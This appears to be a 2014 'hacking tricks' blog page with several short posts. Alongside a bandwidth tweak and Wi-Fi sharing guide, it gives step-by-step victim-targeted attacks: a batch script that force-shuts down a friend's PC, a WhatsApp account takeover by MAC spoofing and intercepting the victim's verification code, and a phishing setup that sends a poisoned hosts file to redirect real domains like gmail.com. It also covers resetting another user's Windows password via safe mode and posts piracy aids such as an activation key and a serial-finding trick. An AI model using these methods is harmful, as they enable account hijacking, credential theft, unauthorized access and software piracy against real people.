Sunday, January 26, 2014

Best Hacking Tricks To Increase Your Internet Speed | Speed Up Your Net Speed By 80%


we all know that a slow internet connection really costs time and makes feel annoying . many friends ask me the ways to increase their internet speed.however . it's possible to do to some extent and make your internet
much better then it was in the past.

There are Two tricks that will help you to increase your internet speed..


First Method- Speed Up Your Net Speed By 20%


1. First you go to start button

2. Go To Run

3. Type gpedit.msc And Then Hit Enter.

4.Then Expand Adminsitrative Templates.

5.Then Network

6.Then QoS Packet Scheduler.

Now A New List Appear . Click On Limit Reservable Bandwidth.
Just Disable it.

Now You Click On Apply .

That's It Now You Are Done !! :)

Now Just Restart Your Computer . And I hope You will Get change in Your Speed

Some Basic Tricks From My Side-

1. Use IDM To Boost Your Downloading Speed.

2. Use A Good Anti-virus in Your Computer.

3. Remove Unwanted Add-ons, Software,Unwanted Files Form Your Computer.

4.Update Your Drivers Periodically.

5.Keep A Good Maintennance Of Your Computer.

Saturday, January 25, 2014


Show a error message and shut down friends computer : 

  • Open Notepad and copy the following code.
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
  • Save it as abc.vbs and send to your friends.

Friday, January 24, 2014

How to Share Internet Connection from PC/Laptop to Android Phone via WI-FI

Now it easy to connect your Android phone to PC/Laptop using Wi-Fi.
 Smartphone the most using thing all over the world and another
 thing that joins this list is internet everyone wants to be connected
 with their family and friends and keep updating their status etc
. So here I’m going to tell you about connecting the wireless
 devices like Smartphone’s like iPhone, Android Phones,
Windows Phones etc. Now you can share internet connection
 between PC and laptop and between PC and Smartphone with
built in Wi-Fi by using a popular tool called Wi-Fi Ad-Hoc networking.
The most unfortunate thing is that you need to root the system
 files of your Android device and change the Wi-Fi configuration
 file settings for accessing the Ad-Hoc networks, but this will
works fine with windows based Smartphone’s.
Don’t worry there is another alternative method which you can
 use to share your laptop and PC internet connection with
 your Smartphone. Here just you need to download this free
software called virtual router and create virtual access point
and it works in almost all Android phones.

Share Internet Connection from PC/Laptop to Android Phone

Download and install Virtual Router Software on to your PC or Laptop.
Open the virtual router program and fill the settings form by entering
 the Network Name [SSID], password and Connection type you want to share.
Note: Make sure that Wi-Fi is enabled in your system
 Also read the hardware documentation for supported Wi-Fi devices in virtual router website.
Virtual router software for Android
Settings on Android
On your Android phone, go to Settings -> Wireless and Networks ->Wi-Fi Settings.
Enable the Wi-Fi in your Android phone.
Once you enabled the phone will scan automatically for available networks,
in some if scan doesn’t take automatically means scan manually.
Then the list of available Wi-Fi networks will be displayed, click on the network
that you have created in virtual router and enter the password and click connect.
That’s it now you have connected your Android phone to Wi-Fi network.
Without waiting get start to access the internet on your Android phone





How To Spy On Someone Else WhatsApp Account !

Step 1 :- First, uninstall WhatsApp from your phone.
Step 2 :-Now you need to have the victim phone’s Media access control (MAC)  address. Different OS have different way of finding Media access control (MAC) address. Here’s how to find victims MAC address :

 For Android - Head over to settings—> About phone—> Status—> Wi-Fi MAC address.
For iPhone - Head over to Settings—> General—> About—> Wi-Fi address
For Windows Phone - Head over to Settings—> About—> More info—> MAC address.
For BlackBerry - Head over to options—> Device—> Device and Status info—> WLAN MAC

Step 3 :-After installing terminal app and BusyBox on your Android.Open Terminal app from your Android and follow the instructions for spoofing the MAC address provided in This Link. If you followed the stepssuccessfully, you will certainly end up with a spoofed MAC address.
 Step 4 :-Now re-install WhatsApp on your phone, enter victims phone number and verify your account by entering the verification code received on victim’s phone.!
Done ..!
Now you can have complete spy on victims WhatsApp ID.

Thursday, January 23, 2014

Windows 8 Microsoft Toolkit Free.





Microsoft Toolkit Free Download only for First 100 Customers.......
Hurry Now...

http://fileoogle.com/windows/?name=Microsoft-Toolkit-2.5-BETA-5-Activator-For-Windows-8.1-&-Office-2013-AmanPC&size=35.69-MB

Use Original Domain Address for Phishing Web pag


phishing image
If you don't know about Phishing Web Page, you need to read this tutorials first:

Once you learned something about phishing, you can come back to this article.

It is easy for a person to identify the phishing page by looking at the url of the webpage.  But for tricking users, hacker can use original domain address.  But how? Let me explain in this article.


Requirements:
  •    Wamp server
  •    Install WinRar

We are going to send an email with an executable to victim. If the victim double click the executable file, then you will get success in this attack. Now, whenever the victim enter the real domain name (like www.facebook.com) ,he will be redirecting to our phishing page.

How is it done? 
   Executable file will change the Host file of Victim system. 
What is host file?
     The host file contains Domain Name and IP address associated with them.  Your host file will be in this path:
C:\Windows\System32\drivers\etc\

Whenever we enter the Domain name or URL (for eg: www.webaddress.com), a query will be send to the DNS (Domain Name server).  This DNS connect to the IP address which is associated with the Domain Name.   But before this to be done, the host file in our system will check for the IP address associated with the Domain Name.  Suppose we make an entry with Domain Name and IP address of our phishing web page(for  eg: www.webaddress.com wiht our ip 123.23.X.X),then there's no query will be send to the DNS.
It will automatically connect to the IP address associated with the Domain Name.  This will fruitful for us to mask the PHISHING web page's URL with Original Domain Name.


Now Let's divide into the Implementation:
  • If you are hosting some other hosting site, probably you won't get the unique IP address for your Phishing Web Page. You can have the IP Address of the hosting only. So if you try to use that IP address, the victim will not bring to your Phishing web page , they will bring to the hosting address. 

So what you can do overcome this problem? You need to set up your own Webserver in home. Using Webserver softwares you can set up your own Hosting service.

  Your computer should be turned on always. Because if you turned off the computer,then probably host will not be in online. Again it will be available when you turned on. So your computer turned on when victim visits your site.


How To set up Your own server?
  Download the  Webserver softwares like WAMP,XAMP(Both are open source software, I meant they are free ).  My suggestion is WAMP.  Because it is my favorite one.  It is easy to use.

Downlad the wamp server from http://www.wampserver.com/

Install the WAMP server.  After installation completed, Go to this folder path:
C:\Wamp\WWW
And paste your phishing web page here.

Start the Wamp Server.
(Start->windows->All Programs->Wamp Server->start wamp server)

you can see the half circle icon(wamp server icon) in system tray(i mean near to the time). Click the icon and select the start all services.

Now type your ip address in address bar of the web browser and hit enter. If you don't know your ip address ,visit www.whatismyip.com.

Now you can see your Phishing web page in your Browser.

Modifying the Host file :
 Copy the Host file from this path "C:\WINDOWS\system32\drivers\etc" to desktop.  Right click on the host file and open with Notepad.

You can see the localhost entry there.
Below that type as :
your_ip     domain_name
For eg:
123.xx.xx.xx www.gmail.com
.
 Save the File.

Compress the Host File:

    Compress hosts file such that when victim opens it, it automatically gets copied to default
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.

Right click on the Hosts file and select the Add to archieve option.  Now follow the steps which is shown in picture:







Now send the zipped file to victim.  If he extract the zip file, then the hosts file will be replaced.
You are done.  Now whenever he try to visit the genuine or original website, the phishing webpage only will be shown.


Some Disadvantages of this Hack:
  •    If your IP address is dynamically changed ,then it is hard to implement it
  •   If your victim is advanced user,he may notice the certificates of site which is shown by browser.
Don't worry it is not at all big problem.   Just try it ane enjoy it.

 Want to say thanks or have doubt? just comment here.

Hacking-Tricks Unlimited: Finding Serial Key Of Any Software Using Simple Go...

Hacking-Tricks Unlimited: Finding Serial Key Of Any Software Using Simple Go...:  Posted by Sanketh Huddar Most of you download and use pirated  software  from torrents or any such other sites, but sometime it...

Hide any Drive

Hide any Drive

How To Hide Any Drive Through Command Prompt

 

Have you ever thought of hiding any drive from your system so that no one can knew about it. You may have heard or even used a lot of software’s that might be able to do that, but if you are GEEK like me and want to do things by your own without using any 3rd party software than this tutorial will show you how you can do it.
Well there are 3 ways of doing it, in this tutorial we are covering command prompt way of doing it.



Here is how to do it:


Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt
Step 2. In the Command Prompt, type Diskpart and hit enter key. If UAC (User Account Control), dialog-box prompts than click Yes.
Step 3. Then type List Volume and press enter, this will produce the list of all drives.

Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 1 (i.e. Volume Number) or by typingSelect Volume C(i.e. Drive letter)

Step 5. To hide a drive, type Remove Letter C. Here, C is the drive letter than you want to hide. You can use any drive letter you want.

Step 6. That’s it. You are done! C drive is now hidden



How to unhide hidden drive


Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.
Step 2. To show the hidden drive type Assign Letter C and hit enter, now you can view C: drive in explorer.


That’s it. This is one way of hiding and un-hiding drives from explorer, for rest two stay tuned.

Windows 8.1 Activation Key Free.

Windows 8.1 Activation Key Free.




Windows 8 hacked.Try This Activation Code And Then Update To Windows 8.1.
Latest Code:-

VMNVQ-VH6XM-GCYW7-4X8VM-8FDG3.

Please Leave Comments.
Thank You.




Finding Serial Key Of Any Software Using Simple Google Trick




google tricks
Most of you download and use pirated software from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very intersting google trick which will allow you to find serial key of any software very easily.

How To Find Serial Key Of Any Software ?

The key 94FBR is a part of  Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick

    1. Go to Google
    2. Then type  Software Name 94FBR
  • Replace Software Name with the name of software whose serial key you want to find
  • Eg: To find serial key of Nero i will type Nero 94fbr
    3. Now press Enter and you will find serial key of software you are looking for as shown below.
google trick to find serial key


How To Hack A Computer Administrator password

For whatever reason you need to get access to a computer without an account, here is how.

EditSteps

  1. 1
    Turn on the Computer.
    Ad
  2. 2
    Before it shows the Windows Logo, start repeatedly pressing the F8 key.
  3. 3
    Use the up/down keys to navigate your way to "Safe Mode with Command Prompt" and press enter. (After this the screen will appear dark and will show a bunch of computer codes. Don't be afraid, this will only go on for a little while. Just make sure no one else comes in when the screen is like that).
    • Then it will go to the account/login screen
  4. 4
    Notice there will be a new account called "Administrator".
  5. 5
    Click on it and then you"ll go to "Safe mode Command Prompt".
  6. 6
    If you know how to change a password using CMD (command prompt), then do it. If not, then type in Net User.
  7. 7
    After this, it will show all the accounts on that computer. Pick which one you want to hack.
    • Let's say on that computer the accounts are named Bob, Nate, and Pat. If you pick Bob then simply type in:net user Bob *
    • After this it will tell you to type a new password
    • When you are typing, it will appear as if you aren't typing anything. Don't worry, this is for security reasons. Just make SURE that you spell it correctly.
  8. 8
    Confirm the password. After you are finished it will ask you to confirm the new password.
    • After this shutdown the computer and then start it up again.
  9. 9
    Find the account that you hacked and enter the new password.